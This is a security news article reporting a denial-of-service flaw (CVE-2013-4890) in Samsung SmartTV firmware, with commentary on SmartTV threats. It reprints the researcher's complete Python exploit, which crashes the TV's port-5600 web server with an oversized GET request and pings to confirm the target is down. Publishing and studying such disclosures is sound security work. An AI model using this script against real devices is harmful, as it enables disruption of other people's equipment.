Researcher demonstrated SmartTV hacking on Samsung models

The researcher Malik Mesellem demonstrated that SmartTV hacking is a real menace, Samsung models could be forced to reboot sending an HTTP GET request

It is known that smartTV hacking is a reality, these devices are connected to the Internet and suffers cyber threats exactly as any other device. Principal security firms predict a bleak future for a large number of devices that we daily use,  in a previous post on the “intelligent components” that surround us I anticipated means and methods of the cyber offensives.  The massive introduction of technology in our life has dramatically increased our surface of attack, we are all potential targets and the majority of users has no awareness of the cyber threats.

It must be considered that these objects in many cases manage also a huge quantity of the user’s data and personal information, in other cases they provide direct access to the user’s environment such as the domestic LAN, or worst the possibility to spy on victims with a camera or a microphone that equip the devices.

SmartTVs are considerable privilege targets for the above reason an attacker could be interested to hack our domestic appliance with following purposes:

• Cyberespionage – Object such as SmartTV are open gates to our domestic network where are available a huge quantity of personal data.
• To recruit new bot to compose powerful botnets to conduct cyber attacks against strategic targets. Let’s think of the possibility to use any device to conduct a DDoS attack or a phishing attack (…soon on these screens … )
• Cybercrime – hackers could be interested in the user’s data related to payments (e.g. Banking credentials) … and this data could be available on gaming console or in clear text on the hard drive of a media center connected to the TV. The principal monetization schema could include the use of ransomware or the spread of malicious agent for Bitcoin mining.

In this day is circulating the news on a vulnerability present in the latest firmware of the Samsung TV models that allows SmartTV hacking, a hacker could hit the device with a Denial of Service (DoS) Attack, according to security researcher Malik Mesellem.

The researcher revealed that the web server (DMCRUIS/0.1) installed on Smart TVs that responds on TCP port  5600 can be used to force a reboot of the device just sending a specifically formatted HTTP GET request on TV’s ip address.

#!/usr/bin/python

# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com
# Date: 07/21/2013
# CVE Number: CVE-2013-4890
# Vendor Homepage: http://www.samsung.com
# Description:
#   The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request
#   As a results, the TV reboots...
#   Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :)

import httplib
import sys
import os

print "  ***************************************************************************************"
print "   Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com\n"
print "   Exploit: Denial of Service (DoS) attack\n"
print "   Description:\n"
print "     The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request."
print "     Tested successfully on my Samsung PS50C7700 plasma TV :)\n"
print "  ***************************************************************************************\n"

# Sends the payload
print "  Sending the malicious payload...\n"
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()

# Checks the response
print "  Checking the status... (CTRL+Z to stop)\n"
response = 0
while response == 0:
  response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
  if response != 0:
    print "  Target down!\n"

Malik Mesellem provided a proof of concept for the SmartTV hacking in a video in which it exploits his Samsung plasms TV PS50C7700.

In the video it is possible to observe that just after receiving the request the TV would restart and repeat the process, this means that an attacker accessing to LAN where TV is installed is able to hack it, this is possible for example designing
a malware that sends requests on compromised LAN.

 

Who and how will manage the updates of these devices?
This will be yet another opportunity provided to the attackers for the SmartTV hacking.

Pierluigi Paganini

(Security Affairs – SmartTV hacking)